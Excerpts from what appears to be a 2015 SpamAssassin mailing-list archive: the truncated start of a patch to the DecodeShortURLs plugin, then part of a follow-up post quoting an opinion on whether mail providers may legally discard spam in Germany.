Hi, $self->{main}->{registryboundaries}->uri_to_domain($fubar); This appears to fix DecodeShortURLs.pm --- DecodeShortURLs.pm.orig 2015-05-15 11:51:44.688835663 -0400 +++ DecodeShortURLs.pm 2015-05-15 11:39:35.020499066 -0400 @@ -486,7 +486,8 @@

Re: Spamassassin not catching spam (Follow-up)

2015-03-25 Thread Dave Wreski
Hi, RH i don't know the UK laws but in germany it's for sure not allowed RH because it's legally classified identical to a postman says meh i don't RH walk to go upstairs today and throw the letter away RH if you pretend to provide relieable mailservices it should be logically RH that discard
